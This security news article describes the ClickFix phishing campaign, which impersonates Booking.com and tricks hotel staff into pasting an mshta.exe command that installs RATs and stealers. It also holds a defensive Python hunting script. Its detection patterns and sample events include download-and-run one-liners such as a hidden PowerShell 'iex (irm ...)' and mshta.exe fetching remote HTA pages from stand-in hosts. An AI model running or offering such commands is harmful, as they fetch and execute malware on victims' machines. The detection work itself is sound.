Booking.com, the latest target of the ClickFix cyberattack

March 17, 2025

The persistent phishing operation dubbed ClickFix is now impersonating Booking.com to infect hospitality workers with malware, including remote access trojans (RATs) and information stealers.

By taking over employees' accounts on the platform, the threat actors aim to steal guests' payment card data and personal information, which they can then use to defraud or further target those guests.


The ClickFix phishing campaign is now using Booking.com as its lure.


ClickFix is currently one of the most widely used social engineering techniques among phishing operators. Its opening move is to ask the user to apply a "fix" for a fictitious error, or to complete a "CAPTCHA", before they are allowed to view content on a website or in a phishing document.

The phishing operators send emails posing as guests asking about a negative Booking.com review, as booking requests from prospective customers, as account verification warnings, and so on. The emails carry an embedded button or a PDF attachment whose link takes the recipient to a fake CAPTCHA page.

The fake CAPTCHA has become a staple of ClickFix operations because it lends the process a false air of legitimacy that lowers the recipient's guard.

Once the target "solves" the malicious CAPTCHA, the page silently copies an mshta.exe command to the Windows clipboard as the next step of its "human verification" procedure.

To "complete verification", the target is told to open the Windows Run dialog (Win+R), paste the clipboard contents into it (Ctrl+V), and press Enter.

Victims do not realise they are about to execute a command on their own machine, because the instructions show only keyboard shortcuts and never the text that was placed on the clipboard. Less technical users are correspondingly easier to deceive.

According to Microsoft, the copied command in this campaign invokes mshta.exe with a URL pointing at a malicious HTML page hosted on the attacker's server.
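The chain described above leaves a distinctive trace in process-creation telemetry: anything pasted into the Run dialog is spawned by explorer.exe, and in the ClickFix case the child is mshta.exe with a remote URL on its command line. The following hunting script is an added example, not code from the original article or from Microsoft. It assumes events have been normalised to dicts with "parent", "image" and "cmdline" fields (as in Sysmon Event ID 1 or EDR equivalents); the sample events and the .invalid hostnames are constructed for the demo, and the PowerShell branch is an assumed generalisation to other ClickFix variants rather than something this article reports.

```python
"""Hunt for the ClickFix "paste into Win+R" pattern in process-creation telemetry.

Added example, not code from the article or from Microsoft. Assumes each event is a
dict with "parent", "image" and "cmdline" (Sysmon Event ID 1 style fields).
"""
import re
from typing import List, Optional, Tuple

# Commands pasted into the Run dialog are launched by the desktop shell.
RUN_DIALOG_PARENT = "explorer.exe"

# Binaries the pasted one-liner is handed to. The article documents mshta.exe;
# PowerShell is an assumed generalisation to other ClickFix variants.
ABUSED_BINARIES = {"mshta.exe", "powershell.exe", "pwsh.exe"}

URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)
# mshta also accepts inline script via protocol handlers, which needs no URL at all.
INLINE_SCRIPT_RE = re.compile(r"\b(?:javascript|vbscript):", re.IGNORECASE)
# Typical PowerShell download-and-run / encoded-command indicators.
PS_SUSPICIOUS_RE = re.compile(
    r"\bIEX\b|Invoke-Expression|Invoke-WebRequest|\birm\b|\biwr\b|DownloadString|-enc(?:odedcommand)?\b",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def clickfix_verdict(event: dict) -> Optional[str]:
    """Return a reason string if the event matches the ClickFix pattern, else None."""
    if basename(event["parent"]) != RUN_DIALOG_PARENT:
        return None  # not launched from the Run dialog / desktop shell
    image = basename(event["image"])
    if image not in ABUSED_BINARIES:
        return None
    cmd = event["cmdline"]
    if image == "mshta.exe":
        if URL_RE.search(cmd):
            return "mshta.exe fetching remote HTA from Run dialog"
        if INLINE_SCRIPT_RE.search(cmd):
            return "mshta.exe running inline script from Run dialog"
        return None  # a local .hta path is common for legitimate installers; not flagged
    # PowerShell branch: remote URL or download/execute flags in the one-liner
    if URL_RE.search(cmd) or PS_SUSPICIOUS_RE.search(cmd):
        return "PowerShell download/execute one-liner from Run dialog"
    return None


def hunt(events: List[dict]) -> List[Tuple[int, str]]:
    """Return (index, reason) for every event that matches the pattern."""
    hits = []
    for i, ev in enumerate(events):
        reason = clickfix_verdict(ev)
        if reason:
            hits.append((i, reason))
    return hits


# Constructed sample telemetry (not captured data); hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://captcha-verify.invalid/check.html"},  # ClickFix: flagged
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},  # local HTA: not flagged
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (irm https://captcha-verify.invalid/a)"'},  # flagged
    {"parent": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://updates.invalid/x.hta"},  # remote HTA, but not from the Run dialog
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},  # benign
]

if __name__ == "__main__":
    for idx, why in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {why} :: {SAMPLE_EVENTS[idx]['cmdline']}")
```

The rule deliberately ignores mshta.exe launched from explorer.exe with a local .hta path, since that is what double-clicking a vendor installer looks like; it also leaves the services.exe case alone because that is a different (scheduled task or service) story that warrants its own rule. Tune the parent and binary sets against your own environment's baseline before deploying.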

That page then downloads and installs a range of remote access trojans and information stealers, including XWorm, Lumma Stealer, VenomRAT, AsyncRAT, DanaBot and NetSupport RAT.

To defend against these attacks, users should always check the sender's address, treat urgent calls to action with suspicion, and watch for the mistakes that give scammers away. Any "verification" step that asks you to press Win+R and paste something is a red flag in itself: a genuine CAPTCHA never requires running a command. Defenders can hunt for the same chain in process telemetry by looking for explorer.exe spawning mshta.exe (or powershell.exe) with a remote URL on the command line, which is exactly what a pasted Run-dialog command looks like.
